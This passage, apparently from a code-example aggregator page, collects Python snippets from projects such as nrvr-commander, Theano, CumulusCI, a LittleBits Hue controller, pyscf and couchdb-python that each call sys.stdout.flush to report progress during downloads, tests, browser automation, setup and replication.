  ftp.quit()

  print 'done'

  print
  print 'Wait for printer to finish updating and reboot before continuing.'
  raw_input("Press Enter to continue...")

Example 45

Project: nrvr-commander Source File: javaw.py
    @classmethod
    def now(cls,
            force=False,
            dontDownload=False,
            ticker=True):
        """Download file or use previously downloaded file.
        
        As implemented uses wget.
        That has been a choice of convenience, could be written in Python instead.
        
        force
            whether to force downloading even if apparently downloaded already.
            
            May be useful for programmatically updating at times.
        
        dontDownload
            whether you don't want to start a download, for some reason.
        
        Return file path."""
        simpleFilename = "jre-version-windows-arch.exe"
        downloadDir = ScriptUser.loggedIn.userHomeRelative("Downloads")
        downloadPath = os.path.join(downloadDir, simpleFilename)
        semaphorePath = downloadPath + cls.semaphoreExtenstion
        #
        if os.path.exists(downloadPath) and not force:
            if not os.path.exists(semaphorePath):
                # file exists and not download in progress,
                # assume it is good
                return downloadPath
            else:
                # file exists and download in progress,
                # presumably from another script running in another process or thread,
                # wait for it to complete
                printed = False
                ticked = False
                # check the essential condition, initially and then repeatedly
                while os.path.exists(semaphorePath):
                    if not printed:
                        # first time only printing
                        print "waiting for " + semaphorePath + " to go away on completion"
                        sys.stdout.flush()
                        printed = True
                    if ticker:
                        if not ticked:
                            # first time only printing
                            sys.stdout.write("[")
                        sys.stdout.write(".")
                        sys.stdout.flush()
                        ticked = True
                    time.sleep(5)
                if ticked:
                    # final printing
                    sys.stdout.write("]\n")
                    sys.stdout.flush()
        elif not dontDownload: # it is normal to download
            if not os.path.exists(downloadDir):
                try:
                    os.makedirs(downloadDir)
                except OSError:
                    if os.path.exists(downloadDir): # concurrently made
                        pass
                    else: # failure
                        raise
            #
            # try downloading
            pid = os.getpid()
            try:
                with open(semaphorePath, "w") as semaphoreFile:
                    # create semaphore file
                    semaphoreFile.write("pid=" + str(pid))
                #
                offlineInstallerUrl = cls._currentOfflineInstallerUrl()
                print "starting to download " + offlineInstallerUrl
                if ticker:
                    sys.stdout.write("[.")
                    sys.stdout.flush()
                try:
                    wget = CommandCapture(
                        ["wget",
                         "--quiet",
                         "-O", downloadPath,
                         offlineInstallerUrl],
                        forgoPty=True)
                    if ticker:
                        sys.stdout.write("]")
                        sys.stdout.flush()
                finally:
                    if ticker:
                        sys.stdout.write("\n")
                        sys.stdout.flush()
            except: # apparently a problem
                print "problem downloading " + downloadPath + " from " + offlineInstallerUrl
                raise
            else:
                print "done downloading " + downloadPath
            finally:
                try:
                    # delete semaphore file
                    os.remove(semaphorePath)
                except:
                    pass
        if os.path.exists(downloadPath):
            # file exists now, assume it is good
            return downloadPath
        else:
            # apparently download has failed
            raise IOError("file not found " + downloadPath)

Example 46

Project: attention-lvcsr Source File: test_rng_mrg.py
@attr('slow')
def test_normal0():

    steps = 50
    std = 2.
    if (mode in ['DEBUG_MODE', 'DebugMode', 'FAST_COMPILE'] or
            mode == 'Mode' and config.linker in ['py']):
        sample_size = (25, 30)
        default_rtol = .02
    else:
        sample_size = (999, 50)
        default_rtol = .01
    sample_size_odd = (sample_size[0], sample_size[1] - 1)
    x = tensor.matrix()

    for size, const_size, var_input, input, avg, rtol, std_tol in [
        (sample_size, sample_size, [], [], -5., default_rtol, default_rtol),
        (x.shape, sample_size, [x],
         [numpy.zeros(sample_size, dtype=config.floatX)],
         -5., default_rtol, default_rtol),
        ((x.shape[0], sample_size[1]), sample_size, [x],
         [numpy.zeros(sample_size, dtype=config.floatX)],
         -5., default_rtol, default_rtol),
        # test odd value
        (sample_size_odd, sample_size_odd, [], [], -5.,
         default_rtol, default_rtol),
        # test odd value
        (x.shape, sample_size_odd, [x],
         [numpy.zeros(sample_size_odd, dtype=config.floatX)],
         -5., default_rtol, default_rtol),
        (sample_size, sample_size, [], [],
         numpy.arange(numpy.prod(sample_size),
                      dtype='float32').reshape(sample_size),
         10. * std / numpy.sqrt(steps), default_rtol),
        # test empty size (scalar)
        ((), (), [], [], -5., default_rtol, 0.02),
        # test with few samples at the same time
        ((1,), (1,), [], [], -5., default_rtol, 0.02),
        ((2,), (2,), [], [], -5., default_rtol, 0.02),
        ((3,), (3,), [], [], -5., default_rtol, 0.02),
            ]:
        # print ''
        # print 'ON CPU:'

        R = MRG_RandomStreams(234, use_cuda=False)
        # Note: we specify `nstreams` to avoid a warning.
        n = R.normal(size=size, avg=avg, std=std,
                     nstreams=rng_mrg.guess_n_streams(size, warn=False))
        f = theano.function(var_input, n, mode=mode)
        # theano.printing.debugprint(f)
        out = f(*input)
        # print 'random?[:10]\n', out[0, 0:10]

        # Increase the number of steps if size implies only a few samples
        if numpy.prod(const_size) < 10:
            steps_ = steps * 50
        else:
            steps_ = steps
        basictest(f, steps_, const_size, target_avg=avg, target_std=std,
                  prefix='mrg ', allow_01=True, inputs=input,
                  mean_rtol=rtol, std_tol=std_tol)

        sys.stdout.flush()

        if mode != 'FAST_COMPILE' and cuda_available:
            # print ''
            # print 'ON GPU:'
            R = MRG_RandomStreams(234, use_cuda=True)
            n = R.normal(size=size, avg=avg, std=std, dtype='float32',
                         nstreams=rng_mrg.guess_n_streams(size, warn=False))
            # well, it's really that this test w GPU doesn't make sense otw
            assert n.dtype == 'float32'
            f = theano.function(var_input, theano.Out(
                theano.sandbox.cuda.basic_ops.gpu_from_host(n),
                borrow=True), mode=mode_with_gpu)

            # theano.printing.debugprint(f)
            sys.stdout.flush()
            gpu_out = numpy.asarray(f(*input))
            # print 'random?[:10]\n', gpu_out[0, 0:10]
            # print '----'
            sys.stdout.flush()
            basictest(f, steps_, const_size, target_avg=avg, target_std=std,
                      prefix='gpu mrg ', allow_01=True, inputs=input,
                      mean_rtol=rtol, std_tol=std_tol)
            # Need to allow some rounding error as their is float
            # computation that are done on the gpu vs cpu
            assert numpy.allclose(out, gpu_out, rtol=5e-6, atol=5e-6)

        # print ''
        # print 'ON CPU w NUMPY:'
        RR = theano.tensor.shared_randomstreams.RandomStreams(234)

        nn = RR.normal(size=size, avg=avg, std=std)
        ff = theano.function(var_input, nn)

        basictest(ff, steps_, const_size, target_avg=avg, target_std=std,
                  prefix='numpy ', allow_01=True, inputs=input, mean_rtol=rtol)

Example 47

Project: CumulusCI Source File: package_upload_jenkins.py
    def build_package(self, build_name):
        """ Builds a managed package by calling SauceLabs via Selenium to click the Upload button """ 
        # Update Status
        print 'Starting browser'
        sys.stdout.flush()

        try:
            driver = self.get_selenium()
        except:
            print "Sleeping 5 more seconds to try again.  Last attempt to connect to Selenium failed"
            sleep(5)
            driver = self.get_selenium()

        driver.implicitly_wait(90) # seconds

        # Load the packages list page
        driver.get('%s/0A2' % self.instance_url)

        # Update Status
        print 'Loaded package listing page'
        sys.stdout.flush()

        # Click the link to the package
        driver.find_element_by_xpath("//th[contains(@class,'dataCell')]/a[text()='%s']" % self.package).click()

        # Update Status
        print 'Loaded package page'
        sys.stdout.flush()

        # Click the Upload button to open the upload form
        driver.find_element_by_xpath("//input[@class='btn' and @value='Upload']").click()

        # Update Status
        print 'Loaded Upload form'
        sys.stdout.flush()

        # Populate and submit the upload form to create a beta managed package
        name_input = driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsBlockSection:VersionInfoSectionItem:VersionText')
        name_input.clear()
        name_input.send_keys(build_name)
        driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsPageBlockButtons:bottom:upload').click()

        # Update Status
        print 'Upload Submitted'
        sys.stdout.flush()

        # Monitor the package upload progress
        retry_count = 0
        last_status = None
        while True:
            try:
                status_message = driver.find_element_by_css_selector('.messageText').text
            except selenium.common.exceptions.StaleElementReferenceException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                sleep(1)
                continue
            except selenium.common.exceptions.NoSuchElementException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                if retry_count > 15:
                    print ".messageText not found after 15 retries"
                    break
                sleep(1)
                retry_count += 1
                continue

            retry_count = 0

            if status_message.startswith('Upload Complete'):
                # Update Status
                print status_message
                sys.stdout.flush()
    
                # Get the version number and install url
                version = driver.find_element_by_xpath("//th[text()='Version Number']/following-sibling::td/span").text
                install_url = driver.find_element_by_xpath("//a[contains(@name, ':pkgInstallUrl')]").get_attribute('href')
            
                self.version = version
                self.install_url = install_url
    
                break

            if status_message.startswith('Upload Failed'):
                print status_message
                sys.stdout.flush()
                break 

            # Update Status
            if status_message != last_status:
                print status_message
                sys.stdout.flush()
            last_status = status_message

            sleep(1)

        driver.quit()    

Example 48

Project: LittleBits-Hue-Controller Source File: LittleBits-Hue-Controller.py
def setup():
    # Intro
    print ''
    print 'Welcome to the LittleBits Hue Controller Setup!'
    print 'This program is open source, so feel free to hack it.'
    print '(c) 2014 Jeremy Blum, Blum Idea Labs (www.jeremyblum.com)'

    print ''
    print 'Follow the prompts. If you need to change your setup in the future, just run this script in setup mode again.'
    print 'You can also manually edit the config file that this setup script will generate.'

    # Hue Hub IP Address
    print ''
    print 'We need to be able to communicate with your Hue lighting hub.'
    print 'If it\'s not already, consider setting your hub to a static IP, or a reserved DHCP IP address.'
    valid_IP = False
    hub_found = False
    while not valid_IP or not hub_found:
        ip = raw_input('Enter the IPv4 Address of your hub (ie. 192.168.0.150): ')
        if is_valid_ipv4(ip):
            valid_IP = True
            print 'Now, go press the "connect" button on the top of your hub'
            raw_input('Once you\'ve done that, hit enter.')
            print 'Searching for Hub at ' + ip + '...',
            sys.stdout.flush()
            try:
                bridge = Bridge(ip)
                bridge.connect()
            except:
                print 'Failed!'
                print 'A Hue Bridge could not be found at that address. Try again.'
            else:
                print 'Found!'
                hub_found = True
        else:
            print 'IP Address is invalid.'

    # Light Choice
    print ''
    print 'Now, we need to choose what lights this will control.'
    print 'Go apply power only to the lights you want this to control.'
    print 'Switch off, unplug, or unscrew Hue lights that you DON\'T want to control.'
    raw_input('Press enter once you\'ve done that...')
    print 'Allowing 10 seconds for the hue api to refresh...',
    sys.stdout.flush()
    time.sleep(10)
    print 'Done.'
    light_ids = hue_get_active_light_ids(bridge)
    light_names = hue_get_light_names(bridge, light_ids)
    group_id = hue_get_group_id(bridge, light_ids)
    print 'Great, lighting group ' + str(group_id) + ' has been added.'
    print 'We\'ll be controlling lights with these IDs/Names:'
    for light_id, light_name in zip(light_ids, light_names):
            print 'Light ID: ' + str(light_id) + ' - ' + light_name
    # TODO: Add some error checking (list length zero, for example)

    # Saving Config
    print ''
    print 'Writing setup info to config file...',
    sys.stdout.flush()
    with open(os.path.dirname(os.path.abspath(__file__)) + "/config.ini", 'w') as f:
            write_config_header(f)
            if not config.has_section('LittleBits'): config.add_section('LittleBits')
            if not config.has_option('LittleBits', 'baud_rate'): config.set('LittleBits', 'baud_rate', baud_rate)

            if not config.has_section('PhilipsHue'): config.add_section('PhilipsHue')
            config.set('PhilipsHue', 'bridge_ip', ip)
            config.set('PhilipsHue', 'group_id',  group_id)
            if not config.has_option('PhilipsHue', 'default_bri'):    config.set('PhilipsHue', 'default_bri',    default_bri)
            if not config.has_option('PhilipsHue', 'default_mood'):   config.set('PhilipsHue', 'default_mood',   default_mood)
            if not config.has_option('PhilipsHue', 'default_tt_sec'): config.set('PhilipsHue', 'default_tt_sec', default_tt_sec)

            if not config.has_section('HueMoods'): config.add_section('HueMoods')
            if not config.has_option('HueMoods', '0'): config.set('HueMoods', '0', mood0)
            if not config.has_option('HueMoods', '1'): config.set('HueMoods', '1', mood1)
            if not config.has_option('HueMoods', '2'): config.set('HueMoods', '2', mood2)
            if not config.has_option('HueMoods', '3'): config.set('HueMoods', '3', mood3)
            if not config.has_option('HueMoods', '4'): config.set('HueMoods', '4', mood4)
            if not config.has_option('HueMoods', '5'): config.set('HueMoods', '5', mood5)
            if not config.has_option('HueMoods', '6'): config.set('HueMoods', '6', mood6)
            if not config.has_option('HueMoods', '7'): config.set('HueMoods', '7', mood7)
            if not config.has_option('HueMoods', '8'): config.set('HueMoods', '8', mood8)
            if not config.has_option('HueMoods', '9'): config.set('HueMoods', '9', mood9)

            config.write(f)
    print 'Done!'

    # Make script run at system boot in background
    print ''
    print 'Setting up cron service to launch the service at boot...',
    sys.stdout.flush()
    cron = CronTab(user=True)
    cron.remove_all(comment='littlebits')
    cron_command = os.path.abspath(__file__)
    job = cron.new(command=cron_command,comment='littlebits')
    job.enable()
    job.every_reboot()
    cron.write()
    print 'Done!'

    print ''
    print 'Setup is now complete. The listening service will launch automatically at system boot.'
    print 'You can test it interactively now by running this script without the -s argument.'

Example 49

Project: pyscf Source File: icmpspt.py
def icmpspt(mc, pttype="NEVPT2", energyE0=0.0, rdmM=0, frozen=0, PTM=1000, PTincore=False, fciExtraLine=[], have3RDM=False, root=0, nroots=1, verbose=None, AAAVsplit=1):

    #remove the -1 state
    import os
    os.system("rm %s/node0/Rotation*.state-1.tmp"%(mc.fcisolver.scratchDirectory))
    os.system("rm %s/node0/wave*.-1.tmp"%(mc.fcisolver.scratchDirectory))

#    if type(mc.fcisolver) is not dmrgci.DMRGCI:
#        if (mc.fcisolver.fcibase_class is not dmrgci.DMRGCI):
#            print "this works with dmrgscf and not regular mcscf"
#            exit(0)

    if (pttype != "NEVPT2" and AAAVsplit != 1):
        print "AAAVsplit only works with CASSCF natural orbitals and NEVPT2"
        exit(0)

    mc.fcisolver.startM = 100
    mc.fcisolver.maxM = max(rdmM,501)
    mc.fcisolver.clearSchedule()
    mc.fcisolver.restart = False

    if (not have3RDM):
        mc.fcisolver.has_threepdm = False

        #we will redo the calculations so lets get ride of -1 states
        import os
        os.system("rm %s/node0/Rotation-*.state-1.tmp"%(mc.fcisolver.scratchDirectory))
        os.system("rm %s/node0/wave-*.-1.tmp"%(mc.fcisolver.scratchDirectory))
        os.system("rm %s/node0/RestartReorder.dat_1"%(mc.fcisolver.scratchDirectory))
    else:
        mc.fcisolver.has_threepdm = True

    mc.fcisolver.generate_schedule()
    mc.fcisolver.extraline = []
    if (PTincore):
        mc.fcisolver.extraline.append('do_npdm_in_core')
    mc.fcisolver.extraline += fciExtraLine


    if (len(mc.fcisolver.orbsym) == 0 and mc.fcisolver.mol.symmetry):
        mcscf.casci_symm.label_symmetry_(mc, mc.mo_coeff)
    ericas = mc.get_h2cas()
    h1e = reduce(numpy.dot, (mc.mo_coeff.T, mc.get_hcore(), mc.mo_coeff))
    dmcore = numpy.dot(mc.mo_coeff[:,:mc.ncore], mc.mo_coeff[:,:mc.ncore].T)*2
    vj, vk = mc._scf.get_jk(mc.mol, dmcore)
    vhfcore = reduce(numpy.dot, (mc.mo_coeff.T, vj-vk*0.5, mc.mo_coeff))
    h1effcas = h1e+vhfcore

    dmrgci.writeIntegralFile(mc.fcisolver, h1effcas[mc.ncore:mc.ncore+mc.ncas, mc.ncore:mc.ncore+mc.ncas], ericas, mc.ncas, mc.nelecas)

    dm1eff = numpy.zeros(shape=(mc.ncas, mc.ncas)) #this is the state average density which is needed in NEVPT2
 
    #loop over all states besides the current root
    if (pttype == "NEVPT2" and nroots>1):
        stateIter = range(nroots)
        stateIter.remove(root)
        for istate in stateIter:
            dm3 = mc.fcisolver.make_rdm3(state=istate, norb=mc.ncas, nelec=mc.nelecas, dt=float_precision)    
            nelec = mc.nelecas[0]+mc.nelecas[1]
            dm2 = numpy.einsum('ijklmk', dm3)/(nelec-2)
            dm1 = numpy.einsum('ijkj', dm2)/(nelec-1)
            dm1eff += dm1

    #now add the contributaion due to the current root
    dm3 = mc.fcisolver.make_rdm3(state=root, norb=mc.ncas, nelec=mc.nelecas, dt=float_precision)    
    nelec = mc.nelecas[0]+mc.nelecas[1]
    dm2 = numpy.einsum('ijklmk', dm3)/(nelec-2)
    dm1 = numpy.einsum('ijkj', dm2)/(nelec-1)
    dm1eff += dm1
    dm1eff = dm1eff/(1.0*nroots)
    import os
    os.system("mkdir int")    
    numpy.save("int/E3",dm3)
    numpy.save("int/E3B.npy", dm3.transpose(0,3,1,4,2,5))
    numpy.save("int/E3C.npy", dm3.transpose(5,0,2,4,1,3))
    del dm3

    #backup the restartreorder file to -1. this is because responseaaav and responseaaac both overwrite this file
    #this means that when we want to restart a calculation after lets say responseaaav didnt finish, the new calculaitons
    #will use the restartreorder file that was written by the incomplete responseaaav run instead of the original dmrg run.
    reorderf1 = "%s/node0/RestartReorder.dat_1"%(mc.fcisolver.scratchDirectory)
    reorderf = "%s/node0/RestartReorder.dat"%(mc.fcisolver.scratchDirectory)
    import os.path
    reorder1present = os.path.isfile(reorderf1) 
    if (reorder1present):
        from subprocess import check_call
        output = check_call("cp %s %s"%(reorderf1, reorderf), shell=True)
    else :
        from subprocess import check_call
        check_call("cp %s %s"%(reorderf, reorderf1), shell=True)
    reorder = numpy.loadtxt("%s/node0/RestartReorder.dat"%(mc.fcisolver.scratchDirectory))


    if (pttype == "NEVPT2") :
        norbs, energyE0 = writeNevpt2Integrals(mc, dm1, dm2, dm1eff, AAAVsplit, frozen)
        sys.stdout.flush()
        print "wrote the integrals to disk"

        for k in range(AAAVsplit):
            writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore, mc.ncas,  norbs,
                              mc.fcisolver, PTM, "AAAV", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine, aaavsplit=AAAVsplit, aaavIter=k, root=root, name = "NEVPT2")
        writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore-frozen, mc.ncas,  norbs-frozen,
                          mc.fcisolver, PTM, "AAAC", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine,root=root, name = "NEVPT2")
        sys.stdout.flush()

        totalE = 0.0;
        totalE += executeNEVPT(nelec, mc.ncore, mc.ncas, frozen, mc.fcisolver.memory)# executeMRLCC(nelec, mc.ncore, mc.ncas)

        try:
            for k in range(AAAVsplit):
                outfile, infile = "responseNEVPT2_aaav%d.out"%(k), "responseNEVPT2_aaav%d.conf"%(k)
                output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
                file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
                import struct
                energy = struct.unpack('d', file1.read(8))[0]
                file1.close()
                totalE += energy
                print "perturber AAAV%i --  %18.9e"%(k, energy)
                sys.stdout.flush()

            if (mc.ncore-frozen != 0):
                outfile, infile = "responseNEVPT2_aaac.out", "responseNEVPT2_aaac.conf"
                output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
                file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
                energy = struct.unpack('d', file1.read(8))[0]
                file1.close()
                totalE += energy
                print "perturber AAAC --  %18.9e"%(energy)

        except ValueError:
            print(output)

        from subprocess import check_call
        return totalE
    else :
        #this is a bad way to do it, the problem is
        #that pyscf works with double precision and
        #
        #energyE0 = writeMRLCCIntegrals(mc, dm1, dm2)
        #sys.stdout.flush()
        energyE0, norbs = writeNumpyforMRLCC(mc, dm1, dm2, frozen) 
        sys.stdout.flush()
        writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore, mc.ncas,  norbs,
                          mc.fcisolver, PTM, "AAAV", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine, root=root, name="MRLCC")
        writeDMRGConfFile(mc.nelecas[0], mc.nelecas[1], mc.ncore-frozen, mc.ncas,  norbs-frozen,
                          mc.fcisolver, PTM, "AAAC", mc.fcisolver.memory, mc.fcisolver.num_thrds, reorder, fciExtraLine, root=root, name="MRLCC")
        totalE = 0.0
        totalE +=  executeMRLCC(nelec, mc.ncore, mc.ncas, frozen, mc.fcisolver.memory)
        from subprocess import check_call
        try:
            outfile, infile = "responseMRLCC_aaav0.out", "responseMRLCC_aaav0.conf"
            output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
            file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
            import struct
            energy = struct.unpack('d', file1.read(8))[0]
            file1.close()
            totalE += energy
            print "perturber AAAV --  %18.9e"%(energy)
        except ValueError:
            print "perturber AAAV -- NA"
            #exit()

        try:
            if (mc.ncore-frozen != 0):
                outfile, infile = "responseMRLCC_aaac.out", "responseMRLCC_aaac.conf"
                output = check_call("%s  %s  %s > %s"%(mc.fcisolver.mpiprefix, mc.fcisolver.executable, infile, outfile), shell=True)
                file1 = open("%s/node0/dmrg.e"%(mc.fcisolver.scratchDirectory),"rb")
                energy = struct.unpack('d', file1.read(8))[0]
                file1.close()
                totalE += energy
                print "perturber AAAC --  %18.9e"%(energy)
        except ValueError:
            print "perturber AAAC -- NA"

        print "total PT  -- %18.9e"%(totalE)
        return totalE

Example 50

Project: couchdb-python Source File: replicate.py
def main():

    usage = '%prog [options] <source> <target>'
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--continuous',
        action='store_true',
        dest='continuous',
        help='trigger continuous replication in cochdb')
    parser.add_option('--compact',
        action='store_true',
        dest='compact',
        help='compact target database after replication')

    options, args = parser.parse_args()
    if len(args) != 2:
        raise parser.error('need source and target arguments')

    # set up server objects

    src, tgt = args
    sbase, spath = findpath(parser, src)
    source = client.Server(sbase)
    tbase, tpath = findpath(parser, tgt)
    target = client.Server(tbase)

    # check database name specs

    if '*' in tpath:
        raise parser.error('invalid target path: must be single db or empty')

    all = sorted(i for i in source if i[0] != '_') # Skip reserved names.
    if not spath:
        raise parser.error('source database must be specified')

    sources = [i for i in all if fnmatch.fnmatchcase(i, spath)]
    if not sources:
        raise parser.error("no source databases match glob '%s'" % spath)

    if len(sources) > 1 and tpath:
        raise parser.error('target path must be empty with multiple sources')
    elif len(sources) == 1:
        databases = [(sources[0], tpath)]
    else:
        databases = [(i, i) for i in sources]

    # do the actual replication

    for sdb, tdb in databases:

        start = time.time()
        print(sdb, '->', tdb)
        sys.stdout.flush()

        if tdb not in target:
            target.create(tdb)
            sys.stdout.write("created")
            sys.stdout.flush()

        sdb = '%s%s' % (sbase, util.urlquote(sdb, ''))
        if options.continuous:
            target.replicate(sdb, tdb, continuous=options.continuous)
        else:
            target.replicate(sdb, tdb)
        print('%.1fs' % (time.time() - start))
        sys.stdout.flush()

    if options.compact:
        for (sdb, tdb) in databases:
            print('compact', tdb)
            target[tdb].compact()
See More Examples - Go to Next Page
Page 1 Selected Page 2 Page 3 Page 4